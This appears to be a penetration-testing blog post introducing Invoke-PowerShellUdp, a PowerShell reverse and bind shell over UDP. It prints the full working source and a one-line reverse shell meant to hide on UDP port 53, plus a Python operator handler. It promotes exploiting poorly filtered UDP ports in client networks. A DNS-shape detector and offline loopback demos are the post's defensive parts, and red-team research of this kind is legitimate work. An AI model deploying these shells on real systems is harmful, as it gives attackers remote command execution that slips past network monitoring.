Week of PowerShell Shells – Day 2 – UDP Shells

Welcome to day 2 of the Week of PowerShell Shells. Today we will see how UDP can be used for interactive PowerShell shells. I love UDP because many security and infrastructure teams love to ignore it. I have seen client environments where UDP ports like 53, 161 and even 389 are not properly filtered and monitored. Let's use this condition to our benefit and get some shells.
Let me introduce Invoke-PowerShellUdp. It is similar to Invoke-PowerShellTcp in syntax. Here is the current source without the credits and help documentation:
function Invoke-PowerShellUdp
{
    [CmdletBinding(DefaultParameterSetName="reverse")] Param(

        [Parameter(Position = 0, Mandatory = $true, ParameterSetName="reverse")]
        [Parameter(Position = 0, Mandatory = $false, ParameterSetName="bind")]
        [String]
        $IPAddress,

        [Parameter(Position = 1, Mandatory = $true, ParameterSetName="reverse")]
        [Parameter(Position = 1, Mandatory = $true, ParameterSetName="bind")]
        [Int]
        $Port,

        [Parameter(ParameterSetName="reverse")]
        [Switch]
        $Reverse,

        [Parameter(ParameterSetName="bind")]
        [Switch]
        $Bind
    )

    try
    {
        #Connect back if the reverse switch is used.
        if ($Reverse)
        {
            $endpoint = New-Object System.Net.IPEndPoint ([System.Net.IPAddress]::Parse($IPAddress),$Port)
            $client = New-Object System.Net.Sockets.UDPClient
        }

        #Bind to the provided port if Bind switch is used.
        #$endpoint stays ANY until the first Receive below fills in the real peer,
        #so the banner and first prompt sent here only reach the operator in reverse mode.
        if ($Bind)
        {
            $endpoint = New-Object System.Net.IPEndPoint ([System.Net.IPAddress]::ANY,$Port)
            $client = New-Object System.Net.Sockets.UDPClient($Port)
        }

        [byte[]]$bytes = 0..255|%{0}

        #Send back current username and computername
        $sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")
        $client.Send($sendbytes,$sendbytes.Length,$endpoint)

        #Show an interactive PowerShell prompt
        $sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>')
        $client.Send($sendbytes,$sendbytes.Length,$endpoint)

        #One datagram in is one command; one datagram out is its output plus a fresh prompt.
        while($true)
        {
            $receivebytes = $client.Receive([ref]$endpoint)
            $returndata = ([text.encoding]::ASCII).GetString($receivebytes)
            $result = (Invoke-Expression -Command $returndata 2>&1 | Out-String )

            $sendback = $result + 'PS ' + (Get-Location).Path + '> '
            $x = ($error[0] | Out-String)
            #Clear $error so the same stale error is not resent with every later reply.
            $error.Clear()
            $sendback2 = $sendback + $x

            #Send results back. A reply larger than one UDP datagram (65507 bytes on IPv4)
            #makes Send throw, which ends the loop: a command with huge output kills the shell.
            $sendbytes = ([text.encoding]::ASCII).GetBytes($sendback2)
            $client.Send($sendbytes,$sendbytes.Length,$endpoint)
        }
        $client.Close()
    }
    catch
    {
        Write-Error $_
    }
}

It is available in the Shells directory of the Nishang repository: https://github.com/samratashok/nishang/tree/master/Shells
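The operator side is usually just nc -u or Powercat, but the datagram protocol the function speaks is worth seeing from both ends: UDP has no connection, so the handler learns the peer from whatever sent the first datagram (the banner, in reverse mode), each command is one datagram, and each reply is output, then 'PS <path>> ', then any $error[0] text. The following is an added example written for this post, not Nishang code; the handler and the simulated target (which only looks up canned answers and is not a real shell) are my own, and everything runs over loopback on constructed data.

```python
# Added example, not from the post or Nishang: an operator-side handler for the
# datagram protocol Invoke-PowerShellUdp speaks, plus a simulated target so the
# exchange runs offline over loopback. All names here are my own assumptions.
import re
import socket
import threading

# The shell appends 'PS <path>> ' after the output and puts $error[0] text after
# that, so the prompt is a separator inside the datagram, not its end.
PROMPT_RE = re.compile(r"PS [^\r\n]*?> ")
MAX_DATAGRAM = 65507  # largest IPv4 UDP payload; bigger Out-String results cannot be sent


def split_reply(text):
    """Split one reply datagram into (command output, error text after the prompt)."""
    matches = list(PROMPT_RE.finditer(text))
    if not matches:
        return text, ""  # no prompt at all: treat the whole datagram as output
    last = matches[-1]
    return text[:last.start()], text[last.end():]


class UdpShellHandler:
    """Operator side. No connection exists, so the peer is whoever sent the first datagram."""

    def __init__(self, bind_addr=("127.0.0.1", 0), timeout=5.0):
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        self.sock.bind(bind_addr)
        self.sock.settimeout(timeout)
        self.peer = None

    @property
    def address(self):
        return self.sock.getsockname()

    def wait_for_reverse(self):
        """Reverse mode: the shell speaks first (banner, then prompt), which reveals the peer."""
        banner, self.peer = self.sock.recvfrom(MAX_DATAGRAM)
        prompt, _ = self.sock.recvfrom(MAX_DATAGRAM)
        return banner.decode("ascii", "replace") + prompt.decode("ascii", "replace")

    def attach_bind(self, peer):
        """Bind mode: the shell learns our endpoint from the first datagram we send; just record it."""
        self.peer = peer

    def send(self, command):
        self.sock.sendto(command.encode("ascii"), self.peer)

    def run(self, command):
        """One command per datagram; returns (output, error_text)."""
        self.send(command)
        while True:
            data, addr = self.sock.recvfrom(MAX_DATAGRAM)
            if addr == self.peer:  # drop datagrams that are not from the shell
                break
        return split_reply(data.decode("ascii", "replace"))

    def close(self):
        self.sock.close()


def simulated_target(handler_addr, responses):
    """Stand-in for the PowerShell side with the same datagram sequence as -Reverse.
    `responses` maps command -> (output, error_text); constructed data, not a real shell."""
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.settimeout(5.0)
    s.sendto(b"Windows PowerShell running as user tester on LAB-PC\n\n", handler_addr)
    s.sendto(b"PS C:\\Users\\tester>", handler_addr)
    try:
        while True:
            data, addr = s.recvfrom(MAX_DATAGRAM)
            cmd = data.decode("ascii", "replace")
            if cmd == "exit":
                return
            out, err = responses.get(cmd, ("", f"{cmd} : The term '{cmd}' is not recognized\n"))
            s.sendto((out + "PS C:\\Users\\tester> " + err).encode("ascii"), addr)
    finally:
        s.close()


def demo():
    """Full round trip over loopback; returns the banner and the parsed replies."""
    h = UdpShellHandler()
    t = threading.Thread(target=simulated_target,
                         args=(h.address, {"whoami": ("lab-pc\\tester\n", "")}), daemon=True)
    t.start()
    result = {"banner": h.wait_for_reverse()}
    result["whoami"] = h.run("whoami")
    result["bogus"] = h.run("bogus")
    h.send("exit")
    t.join(2)
    h.close()
    return result


if __name__ == "__main__":
    print(demo())
```

Two things the exchange makes visible: the handler has nothing to authenticate the peer beyond its source address, so anything that can spoof that address can inject commands, and a single reply larger than one datagram ends the session, so commands with large output are the ones to avoid over this transport.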

A screenshot of an Invoke-PowerShellUdp reverse shell in action:

An interactive PowerShell reverse shell over UDP using IPv6:

A bind connection:

Pcaps for all of the above can be found here on my Google drive: https://drive.google.com/open?id=0B-Hsu8q12kG3fmZoREtISjJyTjZiRGpGN29SVVJDWF9TVlBmVExFRnVlWHRsUkVXOTdmLUU&authuser=0

Invoke-PowerShellUdp has a one-line version as well, with most of the code stripped out. It is reverse-only, and the IP address (the empty string passed to Parse) and the port number need to be hardcoded. Note that it also binds the local side to the same port, so with 53 the traffic is UDP/53 in both directions. Below is the current source of Invoke-PowerShellUdpOneLine:

$endpoint = New-Object System.Net.IPEndPoint ([System.Net.IPAddress]::Parse(""),53);$client = New-Object System.Net.Sockets.UDPClient(53);[byte[]]$bytes = 0..255|%{0};$sendbytes = ([text.encoding]::ASCII).GetBytes('PS> ');$client.Send($sendbytes,$sendbytes.Length,$endpoint);while($true){;$receivebytes = $client.Receive([ref]$endpoint);$returndata = ([text.encoding]::ASCII).GetString($receivebytes);$sendback = (iex $returndata 2>&1 | Out-String );$sendbytes = ([text.encoding]::ASCII).GetBytes($sendback);$client.Send($sendbytes,$sendbytes.Length,$endpoint)};$client.Close()
Powercat can also be used to get an interactive PowerShell over UDP.
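The flip side of hiding on UDP/53 is that the shell's datagrams are raw text, while a real DNS message has a 12-byte header and a well-formed question section. The following is an added check written for this post, not part of Nishang or Powercat: a small DNS-shape heuristic run over constructed datagrams that mirror the one-liner's traffic (port 53 on both ends), with a genuine query built alongside for comparison. Function names and sample addresses are my own.

```python
# Added example, not from the post or Nishang: flag UDP/53 payloads that do not
# parse as DNS. Sample datagrams are constructed here, not captured traffic.
import struct

VALID_OPCODES = {0, 1, 2, 4, 5}  # QUERY, IQUERY, STATUS, NOTIFY, UPDATE (RFC 1035/1996/2136)


def looks_like_dns(payload):
    """Return (True, '') if payload parses as a DNS message, else (False, reason).

    Heuristic: header fields in range, reserved Z bit clear, exactly one question
    (what normal queries and responses carry), and a QNAME that fits in the packet."""
    if len(payload) < 12:
        return False, "shorter than DNS header"
    _id, flags, qd, _an, _ns, _ar = struct.unpack("!HHHHHH", payload[:12])
    opcode = (flags >> 11) & 0xF
    if opcode not in VALID_OPCODES:
        return False, f"invalid opcode {opcode}"
    if flags & 0x0040:  # Z bit must be zero
        return False, "reserved Z bit set"
    if qd != 1:
        return False, f"QDCOUNT {qd}"
    pos = 12
    while True:
        if pos >= len(payload):
            return False, "QNAME runs past end of packet"
        length = payload[pos]
        if length == 0:  # root label terminates the name
            pos += 1
            break
        if length & 0xC0 == 0xC0:  # compression pointer also terminates it
            pos += 2
            break
        if length > 63:
            return False, f"label length {length} > 63"
        pos += 1 + length
    if len(payload) - pos < 4:
        return False, "missing QTYPE/QCLASS"
    return True, ""


def dns_query(name, qtype=1):
    """Build a minimal standard query for `name` (constructed sample traffic)."""
    qname = b"".join(bytes([len(label)]) + label.encode() for label in name.split(".")) + b"\x00"
    header = struct.pack("!HHHHHH", 0x1234, 0x0100, 1, 0, 0, 0)  # RD set, one question
    return header + qname + struct.pack("!HH", qtype, 1)


# (src, dst, payload): the first four mirror the one-liner talking to its handler,
# the last is an ordinary lookup from a workstation to its resolver. All constructed.
SAMPLE_DATAGRAMS = [
    ("10.0.0.5:53", "198.51.100.7:53", b"PS> "),
    ("198.51.100.7:53", "10.0.0.5:53", b"whoami"),
    ("10.0.0.5:53", "198.51.100.7:53", b"lab-pc\\tester\r\n"),
    ("10.0.0.5:53", "198.51.100.7:53", b"Windows PowerShell running as user tester on LAB-PC\n"),
    ("10.0.0.5:41532", "10.0.0.2:53", dns_query("example.com")),
]


def flag_non_dns(datagrams):
    """Return (src, dst, reason) for every datagram that fails the DNS-shape check."""
    flagged = []
    for src, dst, payload in datagrams:
        ok, reason = looks_like_dns(payload)
        if not ok:
            flagged.append((src, dst, reason))
    return flagged


if __name__ == "__main__":
    for hit in flag_non_dns(SAMPLE_DATAGRAMS):
        print(hit)
```

The check is deliberately shape-only; it says nothing about who the shell is talking to, so it pairs naturally with the usual baseline of "UDP/53 to anything other than the configured resolvers".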

That is all for today! Hope you enjoyed it.

If you enjoyed the post and want to learn more and/or want to support my research and work, join me for a two-day training “PowerShell for Penetration Testers” at:
NolaCon, New Orleans (June 10-11th) https://nolacon.com/powershell-for-penetration-testers/

Shakacon, Honolulu (July 6-7th) http://shakacon.org/

